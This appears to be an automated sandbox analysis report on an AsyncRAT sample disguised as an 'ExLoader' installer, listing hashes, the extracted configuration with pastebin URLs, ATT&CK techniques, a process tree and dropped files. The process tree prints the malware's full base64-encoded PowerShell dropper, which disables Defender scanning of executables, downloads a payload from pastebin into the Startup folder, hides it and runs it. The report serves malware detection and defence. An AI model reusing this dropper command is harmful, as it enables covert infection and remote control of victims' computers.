asyncrat | 07cf0a5861804708fe24a76681e4e1945379ed8e3f71678c9545490b7e78e4ee

Analysis

max time kernel
105s
max time network
112s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
25-03-2023 12:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ExLoader_Installer.exe
Size

23.3MB
MD5

d87a43f5c2744f5014401405aad5aa27
SHA1

e13b43d6eb814c7f0ac606754a9eaebe6bd26c43
SHA256

07cf0a5861804708fe24a76681e4e1945379ed8e3f71678c9545490b7e78e4ee
SHA512

be65334aa0f057a469d3f76377b54743e19e63c5df71381b63742cc6f0b075133f1a0e612906386dc6c4fbcc1fce90c84a029a41bb4b30c6b2fe98fcbcec5456
SSDEEP

393216:LmZ9vsN9Vz7SJ5E5clszZw4+f0OuQ+cXXFLRCFM9QT4WR/jADCLWY:iZ9qVz7u5sXAf/F+cXLyM9QHxjADCLr

Score

10^/10

asyncrat default evasion rat

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://pastebin.com/raw/vNcCt60A

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

Mutex

Attributes

delay
1
install
false
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/3Z9zi18j

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 4 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX1\csrss.exe	asyncrat
C:\Users\Admin\AppData\Local\Temp\RarSFX1\csrss.exe	asyncrat
C:\Users\Admin\AppData\Local\Temp\RarSFX1\csrss.exe	asyncrat
behavioral1/memory/796-251-0x0000000000550000-0x0000000000566000-memory.dmp	asyncrat

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

42 1628 powershell.exe
44 1628 powershell.exe
46 1628 powershell.exe
Downloads MZ/PE file
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

2544 attrib.exe

flow	pid	process
42	1628	powershell.exe
44	1628	powershell.exe
46	1628	powershell.exe

pid	process
2544	attrib.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

service.exeWScript.exetmp0O2.exeExLoader_Installer.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	service.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	tmp0O2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	ExLoader_Installer.exe

Drops startup file 2 IoCs

Processes:

attrib.exepowershell.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp0O2.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp0O2.exe	powershell.exe

Executes dropped EXE 3 IoCs

Processes:

service.exetmp0O2.execsrss.exe

pid process

4860 service.exe
3712 tmp0O2.exe
796 csrss.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4020 timeout.exe

pid	process
4860	service.exe
3712	tmp0O2.exe
796	csrss.exe

pid	process
4020	timeout.exe

Modifies registry class 2 IoCs

Processes:

ExLoader_Installer.exeservice.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	ExLoader_Installer.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings	service.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

4556 powershell.exe
4556 powershell.exe
1628 powershell.exe
1628 powershell.exe

pid	process
4556	powershell.exe
4556	powershell.exe
1628	powershell.exe
1628	powershell.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

powershell.exepowershell.execsrss.exe

description	pid	process
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeIncreaseQuotaPrivilege	1628	powershell.exe
Token: SeSecurityPrivilege	1628	powershell.exe
Token: SeTakeOwnershipPrivilege	1628	powershell.exe
Token: SeLoadDriverPrivilege	1628	powershell.exe
Token: SeSystemProfilePrivilege	1628	powershell.exe
Token: SeSystemtimePrivilege	1628	powershell.exe
Token: SeProfSingleProcessPrivilege	1628	powershell.exe
Token: SeIncBasePriorityPrivilege	1628	powershell.exe
Token: SeCreatePagefilePrivilege	1628	powershell.exe
Token: SeBackupPrivilege	1628	powershell.exe
Token: SeRestorePrivilege	1628	powershell.exe
Token: SeShutdownPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeSystemEnvironmentPrivilege	1628	powershell.exe
Token: SeRemoteShutdownPrivilege	1628	powershell.exe
Token: SeUndockPrivilege	1628	powershell.exe
Token: SeManageVolumePrivilege	1628	powershell.exe
Token: 33	1628	powershell.exe
Token: 34	1628	powershell.exe
Token: 35	1628	powershell.exe
Token: 36	1628	powershell.exe
Token: SeDebugPrivilege	796	csrss.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

ExLoader_Installer.exeservice.exeWScript.exepowershell.exepowershell.exetmp0O2.execsrss.execmd.exe

description	pid	process	target process
PID 3716 wrote to memory of 4860	3716	ExLoader_Installer.exe	service.exe
PID 3716 wrote to memory of 4860	3716	ExLoader_Installer.exe	service.exe
PID 3716 wrote to memory of 4860	3716	ExLoader_Installer.exe	service.exe
PID 4860 wrote to memory of 1252	4860	service.exe	WScript.exe
PID 4860 wrote to memory of 1252	4860	service.exe	WScript.exe
PID 4860 wrote to memory of 1252	4860	service.exe	WScript.exe
PID 1252 wrote to memory of 4556	1252	WScript.exe	powershell.exe
PID 1252 wrote to memory of 4556	1252	WScript.exe	powershell.exe
PID 1252 wrote to memory of 4556	1252	WScript.exe	powershell.exe
PID 4556 wrote to memory of 1628	4556	powershell.exe	powershell.exe
PID 4556 wrote to memory of 1628	4556	powershell.exe	powershell.exe
PID 4556 wrote to memory of 1628	4556	powershell.exe	powershell.exe
PID 1628 wrote to memory of 2544	1628	powershell.exe	attrib.exe
PID 1628 wrote to memory of 2544	1628	powershell.exe	attrib.exe
PID 1628 wrote to memory of 2544	1628	powershell.exe	attrib.exe
PID 1628 wrote to memory of 3712	1628	powershell.exe	tmp0O2.exe
PID 1628 wrote to memory of 3712	1628	powershell.exe	tmp0O2.exe
PID 1628 wrote to memory of 3712	1628	powershell.exe	tmp0O2.exe
PID 3712 wrote to memory of 796	3712	tmp0O2.exe	csrss.exe
PID 3712 wrote to memory of 796	3712	tmp0O2.exe	csrss.exe
PID 796 wrote to memory of 4832	796	csrss.exe	cmd.exe
PID 796 wrote to memory of 4832	796	csrss.exe	cmd.exe
PID 4832 wrote to memory of 4020	4832	cmd.exe	timeout.exe
PID 4832 wrote to memory of 4020	4832	cmd.exe	timeout.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

2544 attrib.exe

pid	process
2544	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ExLoader_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\ExLoader_Installer.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3716

C:\Users\Admin\AppData\Local\Temp\service.exe
"C:\Users\Admin\AppData\Local\Temp\service.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4860

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\config.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1252

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Unrestricted -nologo -command .\service.ps1
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand CgAgACAAIAAjAC0AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMALQAjAAoAIAAjAC0AIwAgACAAIABzAGMAcgBpAHAAdAAgAGIAeQAgAGEAdgBpAHIAbwBsACAAXgBfAF4AIAAgACAAIwAtACMACgAgACAAIAAjAC0AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMALQAjAAoACgAkAG0AYQBuAHUAZgBhAGMAdAB1AHIAZQByACAAPQAgACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAHcAaQBuADMAMgBfAGMAbwBtAHAAdQB0AGUAcgBzAHkAcwB0AGUAbQApAC4AbQBhAG4AdQBmAGEAYwB0AHUAcgBlAHIACgAkAG0AbwBkAGUAbAA9ACAAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAdwBpAG4AMwAyAF8AYwBvAG0AcAB1AHQAZQByAHMAeQBzAHQAZQBtACkALgBtAG8AZABlAGwACgAkAGIAaQBvAHMAdgBlAHIAcwBpAG8AbgAgAD0AIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAB3AGkAbgAzADIAXwBiAGkAbwBzACkALgB2AGUAcgBzAGkAbwBuAAoAaQBmACAAKAAkAG0AbwBkAGUAbAAgAC0AbQBhAHQAYwBoACAAIgBWAGkAcgB0AHUAYQBsACAATQBhAGMAaABpAG4AZQAiACkACgB7AAoAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUAIABSAHUAbgBuAGkAbgBnACAAbwBuACAATQBpAGMAcgBvAHMAbwBmAHQAIABWAGkAcgB0AHUAYQBsAGkAegBhAHQAaQBvAG4AIABQAGwAYQB0AGYAbwByAG0AIgAKAHMAbABlAGUAcAAgADUACgBiAHIAZQBhAGsACgB9AAoAZQBsAHMAZQBpAGYAIAAoACQAbQBvAGQAZQBsACAALQBtAGEAdABjAGgAIAAiAFYATQB3AGEAcgBlACAAVgBpAHIAdAB1AGEAbAAgAFAAbABhAHQAZgBvAHIAbQAiACkACgB7AAoAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAFYAaQByAHQAdQBhAGwAIABNAGEAYwBoAGkAbgBlACAAaQBzACAAUgB1AG4AbgBpAG4AZwAgAG8AbgAgAFYATQB3AGEAcgBlACAAVgBpAHIAdAB1AGEAbAAgAFAAbABhAHQAZgBvAHIAbQAiAAoAcwBsAGUAZQBwACAANQAKAGIAcgBlAGEAawAKAH0ACgBlAGwAcwBlAGkAZgAgACgAJABtAG8AZABlAGwAIAAtAG0AYQB0AGMAaAAgACIAVgBpAHIAdAB1AGEAbABCAG8AeAAiACkACgB7AAoAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAFYAaQByAHQAdQBhAGwAIABNAGEAYwBoAGkAbgBlACAAaQBzACAAUgB1AG4AbgBpAG4AZwAgAG8AbgAgAFYAaQByAHQAdQBhAGwAQgBvAHgAIgAKAHMAbABlAGUAcAAgADUACgBiAHIAZQBhAGsACgB9AAoAZQBsAHMAZQBpAGYAIAAoACQAbQBvAGQAZQBsACAALQBtAGEAdABjAGgAIAAiAFgAZQBuACIAKQAKAHsACgBXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACIAVABoAGkAcwAgAE0AYQBjAGgAaQBuAGUAIABpAHMAIABWAGkAcgB0AHUAYQBsACAAbwBuACAAWABlAG4AIABQAGwAYQB0AGYAbwByAG0AIgAKAHMAbABlAGUAcAAgADUACgBiAHIAZQBhAGsACgB9AAoAZQBsAHMAZQBpAGYAIAAoACQAbQBvAGQAZQBsACAALQBtAGEAdABjAGgAIAAiAFEARQBNAFUAIgApAAoAewAKAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAIgBUAGgAaQBzACAATQBhAGMAaABpAG4AZQAgAGkAcwAgAFYAaQByAHQAdQBhAGwAIABvAG4AIABLAFYATQAgAFAAbABhAHQAZgBvAHIAbQAiAAoAcwBsAGUAZQBwACAANQAKAGIAcgBlAGEAawAKAH0ACgBlAGwAcwBlAGkAZgAgACgAJABtAG8AZABlAGwAIAAtAG0AYQB0AGMAaAAgACIARwBvAG8AZwBsAGUAIgApAAoAewAKAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAIgBUAGgAaQBzACAATQBhAGMAaABpAG4AZQAgAGkAcwAgAFYAaQByAHQAdQBhAGwAIABvAG4AIABHAG8AbwBnAGwAZQAgAEMAbABvAHUAZAAiAAoAcwBsAGUAZQBwACAANQAKAGIAcgBlAGEAawAKAH0ACgAkAHYAZQByAHMAaQBvAG4APQBHAGUAdAAtAEMAbwBtAHAAdQB0AGUAcgBJAG4AZgBvAHwAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AZQB4AHAAYQBuAGQAIABPAHMATgBhAG0AZQAKAGkAZgAgACgAJAB2AGUAcgBzAGkAbwBuACAALQBtAGEAdABjAGgAIAAnADEAMAAnACkACgB7AAoAIABlAGMAaABvACAAJwBOAG8AdABoAGkAbgBnACAAdABvACAAZABvACEAJwAKAH0ACgBlAGwAcwBlAGkAZgAgACgAJAB2AGUAcgBzAGkAbwBuACAALQBtAGEAdABjAGgAIAAnADEAMQAnACkACgB7AAoAIABlAGMAaABvACAAJwBOAG8AdABoAGkAbgBnACAAdABvACAAZABvACEAJwAKAH0ACgBlAGwAcwBlAAoAewAKACAAYgByAGUAYQBrAAoAfQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAGUAeABjAGwAdQBzAGkAbwBuAGUAeAB0AGUAbgBzAGkAbwBuACAAJwBlAHgAZQAnACAALQBlAHIAcgBvAHIAYQBjAHQAaQBvAG4AIABzAGkAbABlAG4AdABsAHkAYwBvAG4AdABpAG4AdQBlAAoAJAB1AHIAaQA9ACgAJwBoACcAKwAnAHQAdAAnACsAJwBwACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAcABhAHMAdABlACcAKwAnAGIAaQBuACcAKwAnAC4AJwArACcAYwBvAG0AJwArACcALwAnACsAJwByAGEAdwAnACsAJwAvACcAKwAnAHYATgBjAEMAdAA2ADAAQQAnACkACgAkAHIAYQB3AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJAB1AHIAaQAgAC0AdQBzAGUAYgBhAHMAaQBjAHAAYQByAHMAaQBuAGcACgAkAHIAYQB3AC4AQwBvAG4AdABlAG4AdAAKAGkAZgAgACgAJwBlAHIAcgBvAHIAJwAgAC0AZQBxACAAJAByAGEAdwAuAGMAbwBuAHQAZQBuAHQAKQAKAHsACgAgAGIAcgBlAGEAawAKAH0ACgAkAG4AdQBtAGIAZQByADEAPQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGEAeABpAG0AdQBtACAAJwA5ACcACgAkAG4AdQBtAGIAZQByADIAPQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGEAeABpAG0AdQBtACAAJwA5ACcACgAkAGMAaABhAHIAYQBjAHQAZQByAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AaQBuAHAAdQB0AG8AYgBqAGUAYwB0ACAAJwBBACcALAAnAGEAJwAsACcAQgAnACwAJwBiACcALAAnAEMAJwAsACcAYwAnACwAJwBEACcALAAnAGQAJwAsACcARQAnACwAJwBlACcALAAnAEYAJwAsACcAZgAnACwAJwBHACcALAAnAGcAJwAsACcASAAnACwAJwBoACcALAAnAEkAJwAsACcAaQAnACwAJwBKACcALAAnAGoAJwAsACcASwAnACwAJwBrACcALAAnAEwAJwAsACcAbAAnACwAJwBNACcALAAnAG0AJwAsACcATgAnACwAJwBuACcALAAnAE8AJwAsACcAbwAnACwAJwBQACcALAAnAHAAJwAsACcAUQAnACwAJwBxACcALAAnAFIAJwAsACcAcgAnACwAJwBTACcALAAnAHMAJwAsACcAVAAnACwAJwB0ACcALAAnAFUAJwAsACcAdQAnACwAJwBWACcALAAnAHYAJwAsACcAVwAnACwAJwB3ACcALAAnAFgAJwAsACcAeAAnACwAJwBZACcALAAnAHkAJwAsACcAWgAnACwAJwB6ACcACgAkAHAAYQB0AGgAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAKwBTAHAAZQBjAGkAYQBsAEYAbwBsAGQAZQByAF0AOgA6AFMAdABhAHIAdAB1AHAAKQAKAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuAAoAUwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AIAAtAHAAYQB0AGgAIAAkAHAAYQB0AGgACgAkAG4AYQBtAGUAPQAnAHQAbQBwACcAKwAoACQAbgB1AG0AYgBlAHIAMQApACsAKAAkAGMAaABhAHIAYQBjAHQAZQByACkAKwAoACQAbgB1AG0AYgBlAHIAMgApACsAJwAuAGUAeABlACcACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAHUAcgBpACAAJAByAGEAdwAuAGMAbwBuAHQAZQBuAHQAIAAtAG8AdQB0AGYAaQBsAGUAIAAkAG4AYQBtAGUACgBDADoAXAA/AD8APwA/AD8APwA/AFwAPwA/AD8APwA/AD8AMwAyAFwAYQA/AD8AcgBpAGIALgA/AD8APwAgACsAcwAgACsAaAAgACQAbgBhAG0AZQAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgAC4AXAAkAG4AYQBtAGUA
5⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1628

C:\Windows\SysWOW64\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h tmp0O2.exe
6⤵
- Sets file to hidden
- Drops startup file
- Views/modifies file attributes
PID:2544

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp0O2.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp0O2.exe"
6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3712

C:\Users\Admin\AppData\Local\Temp\RarSFX1\csrss.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\csrss.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBC5B.tmp.bat""
8⤵
- Suspicious use of WriteProcessMemory
PID:4832

C:\Windows\system32\timeout.exe
timeout 3
9⤵
- Delays execution with timeout.exe
PID:4020

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
b0e1352991da830009dc09bb0828d1a6

SHA1
4cf91840883ad57b83558488394721f6e0e19fb7

SHA256
be926637ddd5590ee6b7f53451d7644b7db600fc2218edc1427fbbf441297805

SHA512
cfdf8a23faead0ccada8f8d7785894c4e79f87a591ea20ca549bfcfc8a85651841a7bb581995f15de964f1e73d4af6d1777c0416272f5caab3f53482eb09f8e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
11KB

MD5
c95961874838a39378a315d599cd20dd

SHA1
58de5cbd73084d4fef68773db42d90252d53e7fd

SHA256
b2bb97f97868636dad236350ec604922d9815d141b050be9b356398f5d02a119

SHA512
5186e0f40f48a7aa2c31d33a5f18977a94895cd9e4d2c785bdd1a11de0e2b1f0e49579ac253025ba32138929a93db9561950ce152d87508843f9c7b3fd99bece

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\config.vbs
Filesize
147B

MD5
e04e55d2e6cc3d920631fdc5d6dcc1ce

SHA1
2c4dbcff71f8678623a7c197440ec281804dc5a5

SHA256
f641a99ec7e549970c81d724766f2a60ff031a5ec92aa6fc84228c82eeb4b4eb

SHA512
9511fe4dc599187f4539b8cda476550c54e86cbfcaca339a5db12e980ec322bf488d7458bf76089aa1d845f164f7ddb8adea017923d9a4930b9e821b7a4ae998

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\service.ps1
Filesize
5KB

MD5
24967467d573a0d7e696de24e42879d0

SHA1
93bd41fd20fbc3cdff99f467eaf30b138a0996d1

SHA256
07c4ef893717c970d95f64c24c38e529773255ce824eda925cef9776609b421a

SHA512
e59f1426090cdabb60d67b270e1120e07aae8c154beec6bb0758f70df7db5bffa9ace642ad3430cc7ce03be043e22da457aa0995ec189ff64761072f06a8de76

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\csrss.exe
Filesize
63KB

MD5
82cec76e93ee8cf3fa64515b8615e6c1

SHA1
c090c99a741601d2de9f36fd3760c0b5d85a0e1a

SHA256
d65f0e354e7caac2eab8af89ddd3b5c60f42b41fd49d92d5b32e16cab6bf4fd2

SHA512
654421dc351f12ba5852006b39ab7ce39a08640b50cfd12af9b0988e244a111f389c3c4a36296df3cb82ddd823eb53d77ab57e386ee8f53bdf9056695d60cb02

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\csrss.exe
Filesize
63KB

MD5
82cec76e93ee8cf3fa64515b8615e6c1

SHA1
c090c99a741601d2de9f36fd3760c0b5d85a0e1a

SHA256
d65f0e354e7caac2eab8af89ddd3b5c60f42b41fd49d92d5b32e16cab6bf4fd2

SHA512
654421dc351f12ba5852006b39ab7ce39a08640b50cfd12af9b0988e244a111f389c3c4a36296df3cb82ddd823eb53d77ab57e386ee8f53bdf9056695d60cb02

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\csrss.exe
Filesize
63KB

MD5
82cec76e93ee8cf3fa64515b8615e6c1

SHA1
c090c99a741601d2de9f36fd3760c0b5d85a0e1a

SHA256
d65f0e354e7caac2eab8af89ddd3b5c60f42b41fd49d92d5b32e16cab6bf4fd2

SHA512
654421dc351f12ba5852006b39ab7ce39a08640b50cfd12af9b0988e244a111f389c3c4a36296df3cb82ddd823eb53d77ab57e386ee8f53bdf9056695d60cb02

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eorh0obo.j3m.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\service.exe
Filesize
284KB

MD5
fb659ab7fc1d68415375ee784dc960fc

SHA1
512aa984fe70212e887b522b8e58a200f31eee01

SHA256
b21930c5217c4c38afc7633ae532d7c32cc9b3bf1cb3ab70227057ae1545d365

SHA512
017d5938be95ab44be323e100d5665c22f601cb17447b75cacce9952079d09f1ab51a8ea475af93b73999b966ad78ee2790871f0f1bd06460e1064ff552a62ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\service.exe
Filesize
284KB

MD5
fb659ab7fc1d68415375ee784dc960fc

SHA1
512aa984fe70212e887b522b8e58a200f31eee01

SHA256
b21930c5217c4c38afc7633ae532d7c32cc9b3bf1cb3ab70227057ae1545d365

SHA512
017d5938be95ab44be323e100d5665c22f601cb17447b75cacce9952079d09f1ab51a8ea475af93b73999b966ad78ee2790871f0f1bd06460e1064ff552a62ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\service.exe
Filesize
284KB

MD5
fb659ab7fc1d68415375ee784dc960fc

SHA1
512aa984fe70212e887b522b8e58a200f31eee01

SHA256
b21930c5217c4c38afc7633ae532d7c32cc9b3bf1cb3ab70227057ae1545d365

SHA512
017d5938be95ab44be323e100d5665c22f601cb17447b75cacce9952079d09f1ab51a8ea475af93b73999b966ad78ee2790871f0f1bd06460e1064ff552a62ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpBC5B.tmp.bat
Filesize
165B

MD5
1fe98762855532eb6f4ec041beea5bb1

SHA1
4e9622bff736657e62555803abfd67ba5b761cf1

SHA256
9e9f9f1db37f5164ad7487aef2b575d6d42f1217a3b5f6bc835f1daa89d09f0d

SHA512
5424432c8652ba5e1796ceaee8946270a639bb67f6b186978f3a58b7f0f29dd82194bbf451be64cc6504269eefff1488580f68ce6e191ee27e9401c12898459d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp0O2.exe
Filesize
361KB

MD5
5faa4f95dbccd9097da650a2ff2750bf

SHA1
f08fc9637eaf0f7d5ea42234e895aab0fbc4aee0

SHA256
4e317dcafe951a03beee6a5070aa97acfcc09f219051ea6ef49bf04ae41f7bcf

SHA512
33174bd585481414230c3e68ae60dd6ee1589ec8b18977af98720a14b943dd1cbc5334e6b7e0b4e33414c8e9a54be324a4363145ebd2f4657dabd1e3d657bc6f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp0O2.exe
Filesize
361KB

MD5
5faa4f95dbccd9097da650a2ff2750bf

SHA1
f08fc9637eaf0f7d5ea42234e895aab0fbc4aee0

SHA256
4e317dcafe951a03beee6a5070aa97acfcc09f219051ea6ef49bf04ae41f7bcf

SHA512
33174bd585481414230c3e68ae60dd6ee1589ec8b18977af98720a14b943dd1cbc5334e6b7e0b4e33414c8e9a54be324a4363145ebd2f4657dabd1e3d657bc6f

Download Submit
memory/796-251-0x0000000000550000-0x0000000000566000-memory.dmp

Filesize
88KB

Download
memory/796-252-0x000000001EEF0000-0x000000001EF66000-memory.dmp

Filesize
472KB

Download
memory/796-253-0x000000001EF70000-0x000000001EF8E000-memory.dmp

Filesize
120KB

Download
memory/1628-228-0x0000000008AE0000-0x0000000008AFA000-memory.dmp

Filesize
104KB

Download
memory/1628-212-0x000000007FD90000-0x000000007FDA0000-memory.dmp

Filesize
64KB

Download
memory/1628-205-0x0000000006B70000-0x0000000006B8A000-memory.dmp

Filesize
104KB

Download
memory/1628-206-0x0000000006BD0000-0x0000000006BF2000-memory.dmp

Filesize
136KB

Download
memory/1628-207-0x0000000007F70000-0x0000000008514000-memory.dmp

Filesize
5.6MB

Download
memory/1628-208-0x0000000008BA0000-0x000000000921A000-memory.dmp

Filesize
6.5MB

Download
memory/1628-209-0x0000000007AE0000-0x0000000007B12000-memory.dmp

Filesize
200KB

Download
memory/1628-200-0x0000000003090000-0x00000000030A0000-memory.dmp

Filesize
64KB

Download
memory/1628-204-0x0000000007920000-0x00000000079B6000-memory.dmp

Filesize
600KB

Download
memory/1628-201-0x0000000003090000-0x00000000030A0000-memory.dmp

Filesize
64KB

Download
memory/1628-213-0x00000000731A0000-0x00000000731EC000-memory.dmp

Filesize
304KB

Download
memory/1628-223-0x00000000087C0000-0x00000000087DE000-memory.dmp

Filesize
120KB

Download
memory/1628-224-0x00000000088F0000-0x00000000088FA000-memory.dmp

Filesize
40KB

Download
memory/1628-225-0x0000000003090000-0x00000000030A0000-memory.dmp

Filesize
64KB

Download
memory/1628-226-0x0000000003090000-0x00000000030A0000-memory.dmp

Filesize
64KB

Download
memory/1628-227-0x0000000008A80000-0x0000000008A8E000-memory.dmp

Filesize
56KB

Download
memory/1628-203-0x0000000003090000-0x00000000030A0000-memory.dmp

Filesize
64KB

Download
memory/1628-229-0x0000000008AD0000-0x0000000008AD8000-memory.dmp

Filesize
32KB

Download
memory/1628-230-0x0000000003090000-0x00000000030A0000-memory.dmp

Filesize
64KB

Download
memory/3716-133-0x0000000000400000-0x0000000001B46000-memory.dmp

Filesize
23.3MB

Download
memory/4556-211-0x00000000046A0000-0x00000000046B0000-memory.dmp

Filesize
64KB

Download
memory/4556-210-0x00000000046A0000-0x00000000046B0000-memory.dmp

Filesize
64KB

Download
memory/4556-190-0x0000000005B80000-0x0000000005B9E000-memory.dmp

Filesize
120KB

Download
